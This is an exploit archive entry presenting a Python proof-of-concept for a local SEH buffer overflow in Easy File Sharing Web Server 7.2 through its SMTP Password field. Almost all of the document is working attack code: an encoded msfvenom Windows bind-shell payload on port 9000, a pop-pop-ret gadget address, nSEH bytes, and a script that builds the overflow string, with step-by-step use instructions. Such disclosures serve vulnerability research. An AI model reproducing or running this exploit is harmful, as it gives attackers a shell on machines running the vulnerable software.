Easy File Sharing Web Server 7.2 Local Buffer Overflow

2020-03-19T00:00:00
ID PACKETSTORM:156820
Type packetstorm
Reporter Felipe Winsnes
Modified 2020-03-19T00:00:00

Description

                                        
                                            `# Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow (SEH)  
# Date: 03/16/2020  
# Author: Felipe Winsnes  
# Vendor Homepage: http://www.sharing-file.com/  
# Software Link: http://www.sharing-file.com/download.php  
# Version: 7.2  
# Tested on: Windows 7  
  
# Proof of Concept:  
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"  
# 2.- Copy the content of the new file 'poc.txt' to clipboard  
# 3.- Open fsws.exe  
# 4.- Go to 'Options'  
# 5.- Click upon 'SMTP Setup'  
# 6.- Paste clipboard on bottom-right 'Password' parameter  
# 7.- Profit  
  
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/  
  
import struct  
  
# msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread  
# Payload size: 718 bytes  
  
buf = b""  
buf += b"\x89\xe1\xdd\xc5\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49"  
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"  
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"  
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x49\x78\x6e"  
buf += b"\x62\x67\x70\x57\x70\x63\x30\x31\x70\x6f\x79\x78\x65"  
buf += b"\x56\x51\x6b\x70\x72\x44\x6e\x6b\x70\x50\x70\x30\x6c"  
buf += b"\x4b\x43\x62\x44\x4c\x4e\x6b\x46\x32\x54\x54\x4c\x4b"  
buf += b"\x30\x72\x55\x78\x36\x6f\x68\x37\x30\x4a\x67\x56\x36"  
buf += b"\x51\x6b\x4f\x4c\x6c\x65\x6c\x50\x61\x63\x4c\x54\x42"  
buf += b"\x74\x6c\x67\x50\x59\x51\x5a\x6f\x36\x6d\x56\x61\x68"  
buf += b"\x47\x4a\x42\x6a\x52\x70\x52\x63\x67\x6e\x6b\x73\x62"  
buf += b"\x46\x70\x4e\x6b\x63\x7a\x77\x4c\x6c\x4b\x72\x6c\x36"  
buf += b"\x71\x30\x78\x48\x63\x53\x78\x37\x71\x5a\x71\x43\x61"  
buf += b"\x4c\x4b\x72\x79\x37\x50\x66\x61\x4a\x73\x4c\x4b\x52"  
buf += b"\x69\x45\x48\x58\x63\x54\x7a\x30\x49\x6c\x4b\x64\x74"  
buf += b"\x6e\x6b\x77\x71\x78\x56\x36\x51\x49\x6f\x6c\x6c\x6f"  
buf += b"\x31\x68\x4f\x36\x6d\x73\x31\x78\x47\x45\x68\x69\x70"  
buf += b"\x42\x55\x6c\x36\x35\x53\x51\x6d\x5a\x58\x75\x6b\x63"  
buf += b"\x4d\x36\x44\x31\x65\x58\x64\x63\x68\x4e\x6b\x32\x78"  
buf += b"\x47\x54\x46\x61\x4e\x33\x70\x66\x4e\x6b\x66\x6c\x30"  
buf += b"\x4b\x6e\x6b\x51\x48\x47\x6c\x75\x51\x6e\x33\x6e\x6b"  
buf += b"\x56\x64\x4c\x4b\x47\x71\x4e\x30\x6e\x69\x63\x74\x57"  
buf += b"\x54\x57\x54\x31\x4b\x53\x6b\x61\x71\x32\x79\x33\x6a"  
buf += b"\x46\x31\x79\x6f\x4d\x30\x73\x6f\x31\x4f\x43\x6a\x6c"  
buf += b"\x4b\x37\x62\x48\x6b\x6e\x6d\x71\x4d\x51\x78\x74\x73"  
buf += b"\x76\x52\x43\x30\x37\x70\x73\x58\x54\x37\x64\x33\x30"  
buf += b"\x32\x61\x4f\x70\x54\x33\x58\x30\x4c\x61\x67\x31\x36"  
buf += b"\x66\x67\x69\x6f\x6e\x35\x78\x38\x4a\x30\x46\x61\x33"  
buf += b"\x30\x77\x70\x74\x69\x6a\x64\x31\x44\x50\x50\x72\x48"  
buf += b"\x66\x49\x6d\x50\x70\x6b\x75\x50\x4b\x4f\x6e\x35\x43"  
buf += b"\x5a\x56\x68\x61\x49\x70\x50\x48\x62\x49\x6d\x61\x50"  
buf += b"\x62\x70\x33\x70\x56\x30\x70\x68\x39\x7a\x44\x4f\x39"  
buf += b"\x4f\x79\x70\x69\x6f\x4e\x35\x5a\x37\x43\x58\x64\x42"  
buf += b"\x63\x30\x57\x53\x34\x68\x6c\x49\x5a\x46\x73\x5a\x46"  
buf += b"\x70\x32\x76\x62\x77\x35\x38\x5a\x62\x49\x4b\x74\x77"  
buf += b"\x50\x67\x4b\x4f\x48\x55\x66\x37\x31\x78\x4f\x47\x68"  
buf += b"\x69\x67\x48\x39\x6f\x49\x6f\x69\x45\x53\x67\x62\x48"  
buf += b"\x71\x64\x58\x6c\x65\x6b\x78\x61\x39\x6f\x6a\x75\x36"  
buf += b"\x37\x6d\x47\x61\x78\x70\x75\x62\x4e\x70\x4d\x45\x31"  
buf += b"\x69\x6f\x4e\x35\x71\x78\x43\x53\x70\x6d\x65\x34\x77"  
buf += b"\x70\x6c\x49\x7a\x43\x62\x77\x66\x37\x70\x57\x34\x71"  
buf += b"\x49\x66\x42\x4a\x44\x52\x53\x69\x50\x56\x58\x62\x4b"  
buf += b"\x4d\x72\x46\x39\x57\x53\x74\x75\x74\x77\x4c\x65\x51"  
buf += b"\x66\x61\x4e\x6d\x31\x54\x45\x74\x66\x70\x39\x56\x47"  
buf += b"\x70\x70\x44\x71\x44\x42\x70\x32\x76\x72\x76\x56\x36"  
buf += b"\x61\x56\x70\x56\x42\x6e\x32\x76\x73\x66\x32\x73\x73"  
buf += b"\x66\x72\x48\x63\x49\x38\x4c\x47\x4f\x6d\x56\x59\x6f"  
buf += b"\x39\x45\x4f\x79\x39\x70\x52\x6e\x71\x46\x51\x56\x49"  
buf += b"\x6f\x50\x30\x45\x38\x57\x78\x6c\x47\x47\x6d\x51\x70"  
buf += b"\x6b\x4f\x69\x45\x4f\x4b\x79\x70\x57\x6d\x66\x4a\x76"  
buf += b"\x6a\x70\x68\x4d\x76\x7a\x35\x4f\x4d\x4f\x6d\x6b\x4f"  
buf += b"\x6a\x75\x35\x6c\x64\x46\x33\x4c\x37\x7a\x6f\x70\x4b"  
buf += b"\x4b\x59\x70\x50\x75\x43\x35\x4f\x4b\x63\x77\x67\x63"  
buf += b"\x32\x52\x62\x4f\x33\x5a\x73\x30\x56\x33\x39\x6f\x7a"  
buf += b"\x75\x41\x41"  
  
seh = struct.pack("<I", 0x1002324C) # 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)  
nseh = struct.pack("<I", 0x06710870)  
  
buffer = "A" * 512 + nseh + seh + "A" * 20 + buf + "\xff" * 200  
f = open ("poc.txt", "w")  
f.write(buffer)  
f.close()  
`